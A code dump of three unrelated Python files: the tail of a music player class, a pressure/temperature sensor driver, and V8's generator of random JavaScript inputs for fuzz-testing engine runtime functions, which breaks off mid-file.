self.shuffle_order()
playing_order_len = len(self.order)
self.info['random_index'] -= 1
if self.info['random_index'] < 0:
if self.mode == Player.MODE_RANDOM:
self.info['random_index'] = 0
else:
self.info['random_index'] %= playing_order_len
self.info['idx'] = self.order[self.info['random_index']]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def prev(self):
self.stop()
self.prev_idx()
self.replay()
def shuffle(self):
self.stop()
self.info['playing_mode'] = Player.MODE_RANDOM
self.shuffle_order()
self.info['idx'] = self.info['playing_order'][self.info['random_index']]
self.replay()
def volume_up(self):
self.tune_volume(5)
def volume_down(self):
self.tune_volume(-5)
def update_size(self):
self.ui.update_size()
self.build_playinfo()
def cache_song(self, song_id, song_name, artist, song_url):
def on_exit(song_id, path):
self.songs[str(song_id)]['cache'] = path
self.cache.enable = False
self.cache.enable = True
self.cache.add(song_id, song_name, artist, song_url, on_exit)
self.cache.start_download()
|
sensor_driver.py
|
#...................Drive a pressure/temperature sensor..................
#Author: James Bramante
#Date: May 8, 2017
import ms5837
import threading
import time
import statistics as stats
class SensorDriver(object):
def __init__(self, samplerate = 100., density = 997., baseTime = 0.):
""" Constructor
:type samplerate: float
:type density: float
:param samplerate: rate at which to sample the pressure sensor, in Hz
:param density: density of the water, kg m^-3
"""
#Parse the input parameters
self.samplerate = samplerate
self.density = density
#FINAL variables
self.I2CBUS = 1
self.GRAV = 9.81
#Initialize the sensor
self.sensor = ms5837.MS5837_30BA()
test1 = self.sensor.init()
test2 = self.sensor.read()
self.initialized = test1 & test2
self.running = False
#Initialize output variables
if (baseTime == 0.):
self.baseTime = time.time()
else:
self.baseTime = baseTime
self.basepress = []
for x in range(1,10):
self.sensor.read()
self.basepress += [self.sensor.pressure()]
time.sleep(0.3)
self.basepress = stats.mean(self.basepress)
self.time = [time.time()-self.baseTime]
self.temp = [self.sensor.temperature()]
self.press = [self.basepress]
self.depth = [0]
def daemonize(self):
#Daemonize the run function and thread it
self.thread = threading.Thread(target=self.run,args=(),daemon=True)
self.thread.start()
#Collects sensor data in the background
def run(self):
self.running = True
while self.running:
#Produce pressure and temperature and depth data
self.sensor.read()
self.time += [time.time()-self.baseTime]
self.temp += [self.sensor.temperature()]
self.press += [self.sensor.pressure()]
self.depth += [(self.sensor.pressure() - self.basepress)/self.density/self.GRAV]
#Wait designated interval
time.sleep(1/self.samplerate)
#Stop sampling data
def stop(self):
self.running = False
#Reset the sensor and start recording again, but keep parameters
def reset(self):
self.running = False
#Re-initialize the sensor
self.sensor = ms5837.MS5837_30BA()
self.sensor.init()
#Re-initialize everything
self.baseTime = time.time()
self.basepress = []
for x in range(1,10):
self.sensor.read()
self.basepress += [self.sensor.pressure()]
time.sleep(0.3)
self.basepress = stats.mean(self.basepress)
self.time = [time.time()-self.baseTime]
self.temp = [self.sensor.temperature()]
self.press = [self.basepress]
self.depth = [0]
#Restart the recording thread
self.daemonize()
#Reset the recorded times to a new time origin
def resetClock(self):
newTime = time.time()
self.time -= (newTime - self.baseTime)
self.baseTime = newTime
#Set parameter values
def setDensity(self,den):
self.density = den
def setSamplerate(self,rat):
self.samplerate = rat
#Read recorded values and reset the variables doing it
def readValues(self):
#Make sure all of the data lines up
t = self.time
tempLength = len(t)-1
p = self.press[:tempLength]
T = self.temp[:tempLength]
d = self.depth[:tempLength]
#Only keep the data that will not have been reported yet
tempLength += 1
self.time = self.time[tempLength:]
self.press = self.press[tempLength:]
self.temp = self.temp[tempLength:]
self.depth = self.depth[tempLength:]
return (t,p,T,d)
|
generate-runtime-tests.py
|
#!/usr/bin/env python
# Copyright 2014 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import itertools
import js2c
import multiprocessing
import optparse
import os
import random
import re
import shutil
import signal
import string
import subprocess
import sys
import time
FILENAME = "src/runtime.cc"
HEADERFILENAME = "src/runtime.h"
FUNCTION = re.compile("^RUNTIME_FUNCTION\(Runtime_(\w+)")
ARGSLENGTH = re.compile(".*ASSERT\(.*args\.length\(\) == (\d+)\);")
FUNCTIONEND = "}\n"
MACRO = re.compile(r"^#define ([^ ]+)\(([^)]*)\) *([^\\]*)\\?\n$")
FIRST_WORD = re.compile("^\s*(.*?)[\s({\[]")
WORKSPACE = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), ".."))
BASEPATH = os.path.join(WORKSPACE, "test", "mjsunit", "runtime-gen")
THIS_SCRIPT = os.path.relpath(sys.argv[0])
# Expand these macros, they define further runtime functions.
EXPAND_MACROS = [
"BUFFER_VIEW_GETTER",
"DATA_VIEW_GETTER",
"DATA_VIEW_SETTER",
"RUNTIME_UNARY_MATH",
]
# TODO(jkummerow): We could also whitelist the following macros, but the
# functions they define are so trivial that it's unclear how much benefit
# that would provide:
# ELEMENTS_KIND_CHECK_RUNTIME_FUNCTION
# FIXED_TYPED_ARRAYS_CHECK_RUNTIME_FUNCTION
# TYPED_ARRAYS_CHECK_RUNTIME_FUNCTION
# Counts of functions in each detection state. These are used to assert
# that the parser doesn't bit-rot. Change the values as needed when you add,
# remove or change runtime functions, but make sure we don't lose our ability
# to parse them!
EXPECTED_FUNCTION_COUNT = 417
EXPECTED_FUZZABLE_COUNT = 332
EXPECTED_CCTEST_COUNT = 8
EXPECTED_UNKNOWN_COUNT = 4
EXPECTED_BUILTINS_COUNT = 809
# Don't call these at all.
BLACKLISTED = [
"Abort", # Kills the process.
"AbortJS", # Kills the process.
"CompileForOnStackReplacement", # Riddled with ASSERTs.
"IS_VAR", # Not implemented in the runtime.
"ListNatives", # Not available in Release mode.
"SetAllocationTimeout", # Too slow for fuzzing.
"SystemBreak", # Kills (int3) the process.
# These are weird. They violate some invariants when called after
# bootstrapping.
"DisableAccessChecks",
"EnableAccessChecks",
# The current LiveEdit implementation relies on and messes with internals
# in ways that makes it fundamentally unfuzzable :-(
"DebugGetLoadedScripts",
"DebugSetScriptSource",
"LiveEditFindSharedFunctionInfosForScript",
"LiveEditFunctionSourceUpdated",
"LiveEditGatherCompileInfo",
"LiveEditPatchFunctionPositions",
"LiveEditReplaceFunctionCode",
"LiveEditReplaceRefToNestedFunction",
"LiveEditReplaceScript",
"LiveEditRestartFrame",
"SetScriptBreakPoint",
# TODO(jkummerow): Fix these and un-blacklist them!
"CreateDateTimeFormat",
"CreateNumberFormat",
# TODO(danno): Fix these internal function that are only callable form stubs
# and un-blacklist them!
"NumberToString",
"RxegExpConstructResult",
"RegExpExec",
"StringAdd",
"SubString",
"StringCompare",
"StringCharCodeAt",
"GetFromCache",
# Compilation
"CompileUnoptimized",
"CompileOptimized",
"TryInstallOptimizedCode",
"NotifyDeoptimized",
"NotifyStubFailure",
# Utilities
"AllocateInNewSpace",
"AllocateInTargetSpace",
"AllocateHeapNumber",
"NumberToSmi",
"NumberToStringSkipCache",
"NewSloppyArguments",
"NewStrictArguments",
# Harmony
"CreateJSGeneratorObject",
"SuspendJSGeneratorObject",
"ResumeJSGeneratorObject",
"ThrowGeneratorStateError",
# Arrays
"ArrayConstructor",
"InternalArrayConstructor",
# Literals
"MaterializeRegExpLiteral",
"CreateObjectLiteral",
"CreateArrayLiteral",
"CreateArrayLiteralStubBailout",
# Statements
"NewClosure",
"NewClosureFromStubFailure",
"NewObject",
"NewObjectWithAllocationSite",
"FinalizeInstanceSize",
"Throw",
"ReThrow",
"ThrowReferenceError",
"ThrowNotDateError",
"StackGuard",
"Interrupt",
"PromoteScheduledException",
# Contexts
"NewGlobalContext",
"NewFunctionContext",
"PushWithContext",
"PushCatchContext",
"PushBlockContext",
"PushModuleContext",
"DeleteLookupSlot",
"LoadLookupSlot",
"LoadLookupSlotNoReferenceError",
"StoreLookupSlot",
# Declarations
"DeclareGlobals",
"DeclareModules",
"DeclareContextSlot",
"InitializeConstGlobal",
"InitializeConstContextSlot",
# Eval
"ResolvePossiblyDirectEval",
# Maths
"MathPowSlow",
"MathPowRT"
]
# These will always throw.
THROWS = [
"CheckExecutionState", # Needs to hit a break point.
"CheckIsBootstrapping", # Needs to be bootstrapping.
"DebugEvaluate", # Needs to hit a break point.
"DebugEvaluateGlobal", # Needs to hit a break point.
"DebugIndexedInterceptorElementValue", # Needs an indexed interceptor.
"DebugNamedInterceptorPropertyValue", # Needs a named interceptor.
"DebugSetScriptSource", # Checks compilation state of script.
"GetAllScopesDetails", # Needs to hit a break point.
"GetFrameCount", # Needs to hit a break point.
"GetFrameDetails", # Needs to hit a break point.
"GetRootNaN", # Needs to be bootstrapping.
"GetScopeCount", # Needs to hit a break point.
"GetScopeDetails", # Needs to hit a break point.
"GetStepInPositions", # Needs to hit a break point.
"GetTemplateField", # Needs a {Function,Object}TemplateInfo.
"GetThreadCount", # Needs to hit a break point.
"GetThreadDetails", # Needs to hit a break point.
"IsAccessAllowedForObserver", # Needs access-check-required object.
"UnblockConcurrentRecompilation" # Needs --block-concurrent-recompilation.
]
# Definitions used in CUSTOM_KNOWN_GOOD_INPUT below.
_BREAK_ITERATOR = (
"%GetImplFromInitializedIntlObject(new Intl.v8BreakIterator())")
_COLLATOR = "%GetImplFromInitializedIntlObject(new Intl.Collator('en-US'))"
_DATETIME_FORMAT = (
"%GetImplFromInitializedIntlObject(new Intl.DateTimeFormat('en-US'))")
_NUMBER_FORMAT = (
"%GetImplFromInitializedIntlObject(new Intl.NumberFormat('en-US'))")
# Custom definitions for function input that does not throw.
# Format: "FunctionName": ["arg0", "arg1", ..., argslength].
# None means "fall back to autodetected value".
CUSTOM_KNOWN_GOOD_INPUT = {
"AddNamedProperty": [None, "\"bla\"", None, None, None],
"AddPropertyForTemplate": [None, 10, None, None, None],
"Apply": ["function() {}", None, None, None, None, None],
"ArrayBufferSliceImpl": [None, None, 0, None],
"ArrayConcat": ["[1, 'a']", None],
"BreakIteratorAdoptText": [_BREAK_ITERATOR, None, None],
"BreakIteratorBreakType": [_BREAK_ITERATOR, None],
"BreakIteratorCurrent": [_BREAK_ITERATOR, None],
"BreakIteratorFirst": [_BREAK_ITERATOR, None],
"BreakIteratorNext": [_BREAK_ITERATOR, None],
"CompileString": [None, "false", None],
"CreateBreakIterator": ["'en-US'", "{type: 'string'}", None, None],
"CreateJSFunctionProxy": [None, "function() {}", None, None, None],
"CreatePrivateSymbol": ["\"foo\"", None],
"CreateSymbol": ["\"foo\"", None],
"DateParseString": [None, "new Array(8)", None],
"DefineAccessorPropertyUnchecked": [None, None, "function() {}",
"function() {}", 2, None],
"FunctionBindArguments": [None, None, "undefined", None, None],
"GetBreakLocations": [None, 0, None],
"GetDefaultReceiver": ["function() {}", None],
"GetImplFromInitializedIntlObject": ["new Intl.NumberFormat('en-US')", None],
"InternalCompare": [_COLLATOR, None, None, None],
"InternalDateFormat": [_DATETIME_FORMAT, None, None],
"InternalDateParse": [_DATETIME_FORMAT, None, None],
"InternalNumberFormat": [_NUMBER_FORMAT, None, None],
"InternalNumberParse": [_NUMBER_FORMAT, None, None],
"IsSloppyModeFunction": ["function() {}", None],
"LoadMutableDouble": ["{foo: 1.2}", None, None],
"NewObjectFromBound": ["(function() {}).bind({})", None],
"NumberToRadixString": [None, "2", None],
"ParseJson": ["\"{}\"", 1],
"RegExpExecMultiple": [None, None, "['a']", "['a']", None],
"DefineAccessorProperty": [None, None, "undefined", "undefined", None, None],
"SetIteratorInitialize": [None, None, "2", None],
"SetDebugEventListener": ["undefined", None, None],
"SetFunctionBreakPoint": [None, 200, None, None],
"StringBuilderConcat": ["[1, 2, 3]", 3, None, None],
"StringBuilderJoin": ["['a', 'b']", 4, None, None],
"StringMatch": [None, None, "['a', 'b']", None],
"StringNormalize": [None, 2, None],
"StringReplaceGlobalRegExpWithString": [None, None, None, "['a']", None],
"TypedArrayInitialize": [None, 6, "new ArrayBuffer(8)", None, 4, None],
"TypedArrayInitializeFromArrayLike": [None, 6, None, None, None],
"TypedArraySetFastCases": [None, None, "0", None],
}
# Types of arguments that cannot be generated in a JavaScript testcase.
NON_JS_TYPES = [
"Code", "Context", "FixedArray", "FunctionTemplateInfo",
"JSFunctionResultCache", "JSMessageObject", "Map", "ScopeInfo",
"SharedFunctionInfo"]
class Generator(object):
def RandomVariable(self, varname, vartype, simple):
if simple:
return self._Variable(varname, self.GENERATORS[vartype][0])
return self.GENERATORS[vartype][1](self, varname,
self.DEFAULT_RECURSION_BUDGET)
@staticmethod
def IsTypeSupported(typename):
return typename in Generator.GENERATORS
USUAL_SUSPECT_PROPERTIES = ["size", "length", "byteLength", "__proto__",
"prototype", "0", "1", "-1"]
DEFAULT_RECURSION_BUDGET = 2
PROXY_TRAPS = """{
getOwnPropertyDescriptor: function(name) {
return {value: function() {}, configurable: true, writable: true,
enumerable: true};
},
getPropertyDescriptor: function(name) {
return {value: function() {}, configurable: true, writable: true,
enumerable: true};
},
getOwnPropertyNames: function() { return []; },
getPropertyNames: function() { return []; },
defineProperty: function(name, descriptor) {},
delete: function(name) { return true; },
fix: function() {}
}"""
def _Variable(self, name, value, fallback=None):
args = { "name": name, "value": value, "fallback": fallback }
if fallback:
wrapper = "try { %%s } catch(e) { var %(name)s = %(fallback)s; }" % args
else:
wrapper = "%s"
return [wrapper % ("var %(name)s = %(value)s;" % args)]
def _Boolean(self, name, recursion_budget):
return self._Variable(name, random.choice(["true", "false"]))
def _Oddball(self, name, recursion_budget):
return self._Variable(name,
random.choice(["true", "false", "undefined", "null"]))
def _StrictMode(self, name, recursion_budget):
return self._Variable(name, random.choice([0, 1]))
def _Int32(self, name, recursion_budget=0):
die = random.random()
if die < 0.5:
value = random.choice([-3, -1, 0, 1, 2, 10, 515, 0x3fffffff, 0x7fffffff,
0x40000000, -0x40000000, -0x80000000])
elif die < 0.75:
value = random.randint(-1000, 1000)
else:
value = random.randint(-0x80000000, 0x7fffffff)
return self._Variable(name, value)
def _Uint32(self, name, recursion_budget=0):
die = random.random()
if die < 0.5:
value = random.choice([0, 1, 2, 3, 4, 8, 0x3fffffff, 0x40000000,
0x7fffffff, 0xffffffff])
elif die < 0.75:
value = random.randint(0, 1000)
else:
value = random.randint(0, 0xffffffff)
return self._Variable(name, value)
def _Smi(self, name, recursion_budget):
die = random.random()
if die < 0.5:
value = random.choice([-5, -1, 0, 1, 2, 3, 0x3fffffff, -0x40000000])
elif die < 0.75:
value = random.randint(-1000, 1000)
else:
value = random.randint(-0x40000000, 0x3fffffff)
return self._Variable(name, value)
def _Number(self, name, recursion_budget):
die = random.random()
if die < 0.5:
return self._Smi(name, recursion_budget)
elif die < 0.6:
value = random.choice(["Infinity", "-Infinity", "NaN", "-0",
"1.7976931348623157e+308", # Max value.
"2.2250738585072014e-308", # Min value.
"4.9406564584124654e-324"]) # Min subnormal.
else:
value = random.lognormvariate(0, 15)
return self._Variable(name, value)
def _RawRandomString(self, minlength=0, maxlength=100,
alphabet=string.ascii_letters):
length = random.randint(minlength, maxlength)
result = ""
for i in xrange(length):
result += random.choice(alphabet)
return result
def _SeqString(self, name, recursion_budget):
s1 = self._RawRandomString(1, 5)
s2 = self._RawRandomString(1, 5)
# 'foo' + 'bar'
return self._Variable(name, "\"%s\" + \"%s\"" % (s1, s2))
def _SeqTwoByteString(self, name):
s1 = self._RawRandomString(1, 5)
s2 = self._RawRandomString(1, 5)
# 'foo' + unicode + 'bar'
return self._Variable(name, "\"%s\" + \"\\2082\" + \"%s\"" % (s1, s2))
def _SlicedString(self, name):
s = self._RawRandomString(20, 30)
# 'ffoo12345678901234567890'.substr(1)
return self._Variable(name, "\"%s\".substr(1)" % s)
def _ConsString(self, name):
s1 = self._RawRandomString(8, 15)
s2 = self._RawRandomString(8, 15)
# 'foo12345' + (function() { return 'bar12345';})()
return self._Variable(name,
"\"%s\" + (function() { return \"%s\";})()" % (s1, s2))
def _InternalizedString(self, name):
return self._Variable(name, "\"%s\"" % self._RawRandomString(0, 20))
def _String(self, name, recursion_budget):
die = random.random()
if die < 0.5:
string = random.choice(self.USUAL_SUSPECT_PROPERTIES)
return self._Variable(name, "\"%s\"" % string)
elif die < 0.6:
number_name = name + "_number"
result = self._Number(number_name, recursion_budget)
return result + self._Variable(name, "\"\" + %s" % number_name)
elif die < 0.7:
return self._SeqString(name, recursion_budget)
elif die < 0.8:
return self._ConsString(name)
elif die < 0.9:
return self._InternalizedString(name)
else:
return self._SlicedString(name)
def _Symbol(self, name, recursion_budget):
raw_string_name = name + "_1"
result = self._String(raw_string_name, recursion_budget)
return result + self._Variable(name, "Symbol(%s)" % raw_string_name)
def _Name(self, name, recursion_budget):
if random.random() < 0.2:
return self._Symbol(name, recursion_budget)
return self._String(name, recursion_budget)
def _JSValue(self, name, recursion_budget):
die = random.random()
raw_name = name + "_1"
if die < 0.33:
result = self._String(raw_name, recursion_budget)
return result + self._Variable(name, "new String(%s)" % raw_name)
elif die < 0.66:
result = self._Boolean(raw_name, recursion_budget)
return result + self._Variable(name, "new Boolean(%s)" % raw_name)
else:
result = self._Number(raw_name, recursion_budget)
return result + self._Variable(name, "new Number(%s)" % raw_name)
def _RawRandomPropertyName(self):
if random.random() < 0.5:
return random.choice(self.USUAL_SUSPECT_PROPERTIES)
return self._RawRandomString(0, 10)
def _AddProperties(self, name, result, recursion_budget):
propcount = random.randint(0, 3)
propname = None
for i in range(propcount):
die = random.random()
if die < 0.5:
propname = "%s_prop%d" % (name, i)
result += self._Name(propname, recursion_budget - 1)
else:
propname = "\"%s\"" % self._RawRandomPropertyName()
propvalue_name = "%s_val%d" % (name, i)
result += self._Object(propvalue_name, recursion_budget - 1)
result.append("try { %s[%s] = %s; } catch (e) {}" %
(name, propname, propvalue_name))
if random.random() < 0.2 and propname:
# Force the object to slow mode.
result.append("delete %s[%s];" % (name, propname))
def _RandomElementIndex(self, element_name, result):
if random.random() < 0.5:
return random.randint(-1000, 1000)
result += self._Smi(element_name, 0)
return element_name
def _AddElements(self, name, result, recursion_budget):
elementcount = random.randint(0, 3)
for i in range(elementcount):
element_name = "%s_idx%d" % (name, i)
index = self._RandomElementIndex(element_name, result)
value_name = "%s_elt%d" % (name, i)
result += self._Object(value_name, recursion_budget - 1)
result.append("try { %s[%s] = %s; } catch(e) {}" %
(name, index, value_name))
def _AddAccessors(self, name, result, recursion_budget):
accessorcount = random.randint(0, 3)
for i in range(accessorcount):
propname = self._RawRandomPropertyName()
what = random.choice(["get", "set"])
function_name = "%s_access%d" % (name, i)
result += self._PlainFunction(function_name, recursion_budget - 1)
result.append("try { Object.defineProperty(%s, \"%s\", {%s: %s}); } "
"catch (e) {}" % (name, propname, what, function_name))
def _PlainArray(self, name, recursion_budget):
die = random.random()
if die < 0.5:
literal = random.choice(["[]", "[1, 2]", "[1.5, 2.5]",
"['a', 'b', 1, true]"])
return self._Variable(name, literal)
else:
new = random.choice(["", "new "])
length = random.randint(0, 101000)
return self._Variable(name, "%sArray(%d)" % (new, length))
def _PlainObject(self, name, recursion_budget):
die = random.random()
if die < 0.67:
literal_propcount = random.randint(0, 3)
properties = []
result = []
for i in range(literal_propcount):
propname = self._RawRandomPropertyName()
propvalue_name = "%s_lit%d" % (name, i)
result += self._Object(propvalue_name, recursion_budget - 1)
properties.append("\"%s\": %s" % (propname, propvalue_name))
return result + self._Variable(name, "{%s}" % ", ".join(properties))
else:
return self._Variable(name, "new Object()")
def _JSArray(self, name, recursion_budget):
result = self._PlainArray(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _RawRandomBufferLength(self):
if random.random() < 0.2:
return random.choice([0, 1, 8, 0x40000000, 0x80000000])
return random.randint(0, 1000)
def _JSArrayBuffer(self, name, recursion_budget):
length = self._RawRandomBufferLength()
return self._Variable(name, "new ArrayBuffer(%d)" % length)
def _JSDataView(self, name, recursion_budget):
buffer_name = name + "_buffer"
result = self._JSArrayBuffer(buffer_name, recursion_budget)
args = [buffer_name]
die = random.random()
if die < 0.67:
offset = self._RawRandomBufferLength()
args.append("%d" % offset)
if die < 0.33:
length = self._RawRandomBufferLength()
args.append("%d" % length)
result += self._Variable(name, "new DataView(%s)" % ", ".join(args),
fallback="new DataView(new ArrayBuffer(8))")
return result
def _JSDate(self, name, recursion_budget):
die = random.random()
if die < 0.25:
return self._Variable(name, "new Date()")
elif die < 0.5:
ms_name = name + "_ms"
result = self._Number(ms_name, recursion_budget)
return result + self._Variable(name, "new Date(%s)" % ms_name)
elif die < 0.75:
str_name = name + "_str"
month = random.choice(["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul",
"Aug", "Sep", "Oct", "Nov", "Dec"])
day = random.randint(1, 28)
year = random.randint(1900, 2100)
hour = random.randint(0, 23)
minute = random.randint(0, 59)
second = random.randint(0, 59)
str_value = ("\"%s %s, %s %s:%s:%s\"" %
(month, day, year, hour, minute, second))
result = self._Variable(str_name, str_value)
return result + self._Variable(name, "new Date(%s)" % str_name)
else:
components = tuple(map(lambda x: "%s_%s" % (name, x),
["y", "m", "d", "h", "min", "s", "ms"]))
return ([j for i in map(self._Int32, components) for j in i] +
self._Variable(name, "new Date(%s)" % ", ".join(components)))
def _PlainFunction(self, name, recursion_budget):
result_name = "result"
body = ["function() {"]
body += self._Object(result_name, recursion_budget - 1)
body.append("return result;\n}")
return self._Variable(name, "%s" % "\n".join(body))
def _JSFunction(self, name, recursion_budget):
result = self._PlainFunction(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _JSFunctionProxy(self, name, recursion_budget):
# TODO(jkummerow): Revisit this as the Proxy implementation evolves.
return self._Variable(name, "Proxy.createFunction(%s, function() {})" %
self.PROXY_TRAPS)
def _JSGeneratorObject(self, name, recursion_budget):
# TODO(jkummerow): Be more creative here?
return self._Variable(name, "(function*() { yield 1; })()")
def _JSMap(self, name, recursion_budget, weak=""):
result = self._Variable(name, "new %sMap()" % weak)
num_entries = random.randint(0, 3)
for i in range(num_entries):
key_name = "%s_k%d" % (name, i)
value_name = "%s_v%d" % (name, i)
if weak:
result += self._JSObject(key_name, recursion_budget - 1)
else:
result += self._Object(key_name, recursion_budget - 1)
result += self._Object(value_name, recursion_budget - 1)
result.append("%s.set(%s, %s)" % (name, key_name, value_name))
return result
def _JSMapIterator(self, name, recursion_budget):
map_name = name + "_map"
result = self._JSMap(map_name, recursion_budget)
iterator_type = random.choice(['keys', 'values', 'entries'])
return (result + self._Variable(name, "%s.%s()" %
(map_name, iterator_type)))
def _JSProxy(self, name, recursion_budget):
# TODO(jkummerow): Revisit this as the Proxy implementation evolves.
return self._Variable(name, "Proxy.create(%s)" % self.PROXY_TRAPS)
def _JSRegExp(self, name, recursion_budget):
flags = random.choice(["", "g", "i", "m", "gi"])
string = "a(b|c)*a" # TODO(jkummerow): Be more creative here?
ctor = random.choice(["/%s/%s", "new RegExp(\"%s\", \"%s\")"])
return self._Variable(name, ctor % (string, flags))
def _JSSet(self, name, recursion_budget, weak=""):
result = self._Variable(name, "new %sSet()" % weak)
num_entries = random.randint(0, 3)
for i in range(num_entries):
element_name = "%s_e%d" % (name, i)
if weak:
result += self._JSObject(element_name, recursion_budget - 1)
else:
result += self._Object(element_name, recursion_budget - 1)
result.append("%s.add(%s)" % (name, element_name))
return result
def _JSSetIterator(self, name, recursion_budget):
set_name = name + "_set"
result = self._JSSet(set_name, recursion_budget)
iterator_type = random.choice(['values', 'entries'])
return (result + self._Variable(name, "%s.%s()" %
(set_name, iterator_type)))
def _JSTypedArray(self, name, recursion_budget):
arraytype = random.choice(["Int8", "Int16", "Int32", "Uint8", "Uint16",
"Uint32", "Float32", "Float64", "Uint8Clamped"])
ctor_type = random.randint(0, 3)
if ctor_type == 0:
length = random.randint(0, 1000)
return self._Variable(name, "new %sArray(%d)" % (arraytype, length),
fallback="new %sArray(8)" % arraytype)
elif ctor_type == 1:
input_name = name + "_typedarray"
result = self._JSTypedArray(input_name, recursion_budget - 1)
return (result +
self._Variable(name, "new %sArray(%s)" % (arraytype, input_name),
fallback="new %sArray(8)" % arraytype))
elif ctor_type == 2:
arraylike_name = name + "_arraylike"
result = self._JSObject(arraylike_name, recursion_budget - 1)
length = random.randint(0, 1000)
result.append("try { %s.length = %d; } catch(e) {}" %
(arraylike_name, length))
return (result +
self._Variable(name,
"new %sArray(%s)" % (arraytype, arraylike_name),
fallback="new %sArray(8)" % arraytype))
else:
die = random.random()
buffer_name = name + "_buffer"
args = [buffer_name]
result = self._JSArrayBuffer(buffer_name, recursion_budget)
if die < 0.67:
offset_name = name + "_offset"
args.append(offset_name)
result += self._Int32(offset_name)
if die < 0.33:
length_name = name + "_length"
args.append(length_name)
result += self._Int32(length_name)
return (result +
self._Variable(name,
"new %sArray(%s)" % (arraytype, ", ".join(args)),
fallback="new %sArray(8)" % arraytype))
def _JSArrayBufferView(self, name, recursion_budget):
if random.random() < 0.4:
return self._JSDataView(name, recursion_budget)
else:
return self._JSTypedArray(name, recursion_budget)
def _JSWeakCollection(self, name, recursion_budget):
ctor = random.choice([self._JSMap, self._JSSet])
return ctor(name, recursion_budget, weak="Weak")
def _PropertyDetails(self, name, recursion_budget):
# TODO(jkummerow): Be more clever here?
return self._Int32(name)
def _JSObject(self, name, recursion_budget):
die = random.random()
if die < 0.4:
function = random.choice([self._PlainObject, self._PlainArray,
self._PlainFunction])
elif die < 0.5:
return self._Variable(name, "this") # Global object.
else:
function = random.choice([self._JSArrayBuffer, self._JSDataView,
self._JSDate, self._JSFunctionProxy,
self._JSGeneratorObject, self._JSMap,
self._JSMapIterator, self._JSRegExp,
self._JSSet, self._JSSetIterator,
self._JSTypedArray, self._JSValue,
self._JSWeakCollection])
result = function(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _JSReceiver(self, name, recursion_budget):
if random.random() < 0.9: return self._JSObject(name, recursion_budget)
return self._JSProxy(name, recursion_budget)
def _HeapObject(self, name, recursion_budget):
die = random.random()
if die < 0.9: return self._JSReceiver(name, recursion_budget)
elif die < 0.95: return self._Oddball(name, recursion_budget)
else: return self._Name(name, recursion_budget)
def _Object(self, name, recursion_budget):
if recursion_budget <= 0:
function = random.choice([self._Oddball, self._Number, self._Name,
self._JSValue, self._JSRegExp])
return function(name, recursion_budget)
if random.random() < 0.2:
return self._Smi(name, recursion_budget)
return self._HeapObject(name, recursion_budget)
GENERATORS = {
"Boolean": ["true", _Boolean],
"HeapObject": ["new Object()", _HeapObject],
"Int32": ["32", _Int32],
"JSArray": ["new Array()", _JSArray],
"JSArrayBuffer": ["new ArrayBuffer(8)", _JSArrayBuffer],
"JSArrayBufferView": ["new Int32Array(2)", _JSArrayBufferView],
"JSDataView": ["new DataView(new ArrayBuffer(24))", _JSDataView],
"JSDate": ["new Date()", _JSDate],
"JSFunction": ["function() {}", _JSFunction],
"JSFunctionProxy": ["Proxy.createFunction({}, function() {})",
_JSFunctionProxy],
"JSGeneratorObject": ["(function*(){ yield 1; })()", _JSGeneratorObject],
"JSMap": ["new Map()", _JSMap],
"JSMapIterator": ["new Map().entries()", _JSMapIterator],
"JSObject": ["new Object()", _JSObject],
"JSProxy": ["Proxy.create({})", _JSProxy],
"JSReceiver": ["new Object()", _JSReceiver],
"JSRegExp": ["/ab/g", _JSRegExp],
"JSSet": ["new Set()", _JSSet],
"JSSetIterator": ["new Set().values()", _JSSetIterator],
"JSTypedArray": ["new Int32Array(2)", _JSTypedArray],
"JSValue": ["new String('foo')", _JSValue],
"JSWeakCollection": ["new WeakMap()", _JSWeakCollection],
"Name": ["\"name\"", _Name],
"Number": ["1.5", _Number],
"Object": ["new Object()", _Object],
"PropertyDetails": ["513", _PropertyDetails],
"SeqOneByteString": ["\"seq 1-byte\"", _SeqString],
"SeqString": ["\"seqstring\"", _SeqString],
"SeqTwoByteString": ["\"seq \\u2082-byte\"", _SeqTwoByteString],
"Smi": ["1", _Smi],
"StrictMode": ["1", _StrictMode],
"String": ["\"foo\"", _String],
"Symbol": ["Symbol(\"symbol\")", _Symbol],
"Uint32": ["32", _Uint32],
}
class ArgParser(object):
def __init__(self, regex, ctor):
self.regex = regex
self.ArgCtor = ctor
class Arg(object):
def __init__(self, typename, varname, index):
self.type = typename
self.name = "_%s" % varname
self.index = index
class Function(object):
def __init__(self, match):
self.name = match.group(1)
self.argslength = -1
self.args = {}
self.inline = ""
handle_arg_parser = ArgParser(
re.compile("^\s*CONVERT_ARG_HANDLE_CHECKED\((\w+), (\w+), (\d+)\)"),
lambda match: Arg(match.group(1), match.group(2), int(match.group(3))))
plain_arg_parser = ArgParser(
re.compile("^\s*CONVERT_ARG_CHECKED\((\w+), (\w+), (\d+)\)"),
lambda match: Arg(match.group(1), match.group(2), int(match.group(3))))
number_handle_arg_parser = ArgParser(
re.compile("^\s*CONVERT_NUMBER_ARG_HANDLE_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Number", match.group(1), int(match.group(2))))
smi_arg_parser = ArgParser(
re.compile("^\s*CONVERT_SMI_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Smi", match.group(1), int(match.group(2))))
double_arg_parser = ArgParser(
re.compile("^\s*CONVERT_DOUBLE_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Number", match.group(1), int(match.group(2))))
number_arg_parser = ArgParser(
re.compile(
"^\s*CONVERT_NUMBER_CHECKED\(\w+, (\w+), (\w+), args\[(\d+)\]\)"),
lambda match: Arg(match.group(2), match.group(1), int(match.group(3))))
strict_mode_arg_parser = ArgParser(
re.compile("^\s*CONVERT_STRICT_MODE_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("StrictMode", match.group(1), int(match.group(2))))
boolean_arg_parser = ArgParser(
